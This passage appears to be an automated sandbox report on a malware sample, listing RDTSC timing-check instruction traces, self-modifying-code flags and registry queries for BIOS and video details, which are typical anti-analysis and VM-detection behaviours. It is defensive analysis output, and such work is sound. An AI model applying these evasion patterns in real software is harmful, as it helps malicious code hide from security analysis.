                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023D9E second address: 1023DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102407A second address: 10240B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jmp 00007F5AD8CCD675h 0x0000000b jmp 00007F5AD8CCD679h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10240B0 second address: 10240B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10244FA second address: 102450B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD66Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BE09 second address: 102BE2A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jnp 00007F5AD8CCF436h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5AD8CCF43Dh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C6D7 second address: 102C6EC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5AD8CCD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F5AD8CCD666h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C81E second address: 102C83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCF43Bh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c jmp 00007F5AD8CCF43Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C83A second address: 102C849 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jg 00007F5AD8CCD666h 0x0000000b pop ebx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C9BC second address: 102C9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C9C7 second address: 102C9CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CCDC second address: 102CCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DA81 second address: 102DA87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DA87 second address: 102DA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F5AD8CCF43Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B97B second address: 102B97F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B97F second address: 102B99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5AD8CCF436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5AD8CCF442h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B99D second address: 102B9C2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F5AD8CCD666h 0x00000009 jmp 00007F5AD8CCD677h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B9C2 second address: 102B9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103657C second address: 1036582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036582 second address: 103659F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F5AD8CCF436h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F5AD8CCF43Ch 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103659F second address: 10365A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041974 second address: 104197E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5AD8CCF436h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104197E second address: 1041984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104564D second address: 1045675 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5AD8CCF436h 0x00000008 jmp 00007F5AD8CCF443h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F5AD8CCF436h 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045675 second address: 10456B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F5AD8CCD67Ch 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F5AD8CCD674h 0x00000013 jmp 00007F5AD8CCD678h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045384 second address: 10453A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5AD8CCF442h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jg 00007F5AD8CCF436h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055E65 second address: 1055E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055E69 second address: 1055E79 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jno 00007F5AD8CCF436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055E79 second address: 1055E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058C76 second address: 1058CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCF446h 0x00000009 popad 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5AD8CCF442h 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A2C7 second address: 105A2EC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F5AD8CCD67Dh 0x0000000e jmp 00007F5AD8CCD677h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F312 second address: 105F316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F316 second address: 105F322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5AD8CCD666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F322 second address: 105F340 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5AD8CCF43Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F5AD8CCF436h 0x00000010 ja 00007F5AD8CCF436h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F340 second address: 105F346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F346 second address: 105F361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5AD8CCF43Dh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F361 second address: 105F365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F365 second address: 105F36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F36B second address: 105F387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5AD8CCD676h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F387 second address: 105F3A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF445h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F5AD8CCF436h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F3A8 second address: 105F3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F52E second address: 105F544 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5AD8CCF43Dh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F544 second address: 105F55E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F5AD8CCD66Fh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105FACF second address: 105FADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AD8CCF43Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105FDC8 second address: 105FDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106075F second address: 1060776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F5AD8CCF43Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063E9A second address: 1063EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064002 second address: 1064008 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064008 second address: 1064014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107087E second address: 107088E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10706CE second address: 10706F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD66Ch 0x00000007 je 00007F5AD8CCD666h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 jmp 00007F5AD8CCD66Fh 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10706F8 second address: 1070702 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5AD8CCF43Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070702 second address: 1070719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5AD8CCD66Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D573 second address: 107D577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D577 second address: 107D590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5AD8CCD66Ah 0x0000000c jng 00007F5AD8CCD666h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10801C5 second address: 10801CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10801CA second address: 10801E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 jmp 00007F5AD8CCD66Ch 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108004F second address: 1080064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a push ebx 0x0000000b jnp 00007F5AD8CCF43Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FDCE second address: 108FDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FDD2 second address: 108FDD8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FDD8 second address: 108FDDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FDDE second address: 108FDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EAF1 second address: 108EAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EAF5 second address: 108EAF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EC6E second address: 108EC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EC72 second address: 108EC9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5AD8CCF441h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F5AD8CCF440h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EC9E second address: 108ECA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EE1F second address: 108EE3A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5AD8CCF436h 0x00000008 ja 00007F5AD8CCF436h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jne 00007F5AD8CCF438h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EE3A second address: 108EE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EE49 second address: 108EE5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007F5AD8CCF436h 0x0000000c popad 0x0000000d jne 00007F5AD8CCF438h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EE5E second address: 108EE7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F5AD8CCD678h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EE7D second address: 108EE8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F5AD8CCF436h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F144 second address: 108F159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5AD8CCD66Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F159 second address: 108F15F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F15F second address: 108F165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F165 second address: 108F169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F8ED second address: 108F928 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5AD8CCD678h 0x00000008 jmp 00007F5AD8CCD670h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jno 00007F5AD8CCD66Ah 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jnp 00007F5AD8CCD694h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5AD8CCD66Dh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F928 second address: 108F941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF445h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FADA second address: 108FAED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F5AD8CCD666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093BEF second address: 1093C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AD8CCF449h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093C0C second address: 1093C29 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5AD8CCD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5AD8CCD66Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093C29 second address: 1093C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093CCD second address: 1093CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093CD3 second address: 1093D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5AD8CCF442h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093D00 second address: 1093D05 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109411C second address: 1094120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529024F second address: 529026B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529026B second address: 529026F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529026F second address: 5290282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD66Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290374 second address: 529037A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529037A second address: 52903C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5AD8CCD66Ch 0x00000008 call 00007F5AD8CCD672h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F5AD8CCD66Ah 0x0000001b xor eax, 73ACA698h 0x00000021 jmp 00007F5AD8CCD66Bh 0x00000026 popfd 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52903C0 second address: 5290426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushfd 0x00000006 jmp 00007F5AD8CCF43Bh 0x0000000b sbb eax, 7D06DF5Eh 0x00000011 jmp 00007F5AD8CCF449h 0x00000016 popfd 0x00000017 pop ecx 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c jmp 00007F5AD8CCF447h 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5AD8CCF445h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E01C61 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E01B96 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FC1AB0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FAF4DC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
